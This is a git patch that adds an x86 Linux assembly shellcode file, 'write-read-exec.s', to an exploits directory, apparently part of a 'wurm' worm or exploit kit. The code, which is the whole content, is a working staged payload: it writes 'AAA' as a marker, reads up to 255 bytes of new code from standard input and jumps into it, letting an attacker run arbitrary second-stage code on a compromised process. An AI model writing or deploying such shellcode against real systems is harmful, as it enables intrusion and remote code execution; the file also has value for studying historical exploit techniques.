From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 exploits/7350wurm/shellcode/write-read-exec.s | 38 +++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 exploits/7350wurm/shellcode/write-read-exec.s

(limited to 'exploits/7350wurm/shellcode/write-read-exec.s')

diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s
new file mode 100644
index 0000000..6f3956c
--- /dev/null
+++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+
+/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
+wr_pos:	xorl	%ebx, %ebx
+	incl	%ebx		/* ebx = 1 */
+
+	movl	$0x0b51740b, %eax
+	subl	$0x01010101, %eax
+	push	%eax
+	movl	%esp, %ecx	/* ecx = "AAA\n" */
+
+	push	$0x04
+	pop	%eax		/* eax = 4 */
+	movl	%eax, %edx
+
+	int	$0x80		/* write (1, "AAA\n", 4) */
+
+	jmp	ctramp
+rd_cde:	xorl	%ebx, %ebx
+	mull	%ebx		/* ebx = eax = edx = 0 */
+
+	decb	%dl		/* edx = 0xff */
+	popl	%ecx		/* ecx = ncode */
+
+	push	$0x3
+	pop	%eax
+
+	int	$0x80		/* read (0, ncode, 0xff) */
+	jmp	ncode
+
+ctramp:	call	rd_cde
+ncode:
+
+cend:
+
-- 
cgit v1.3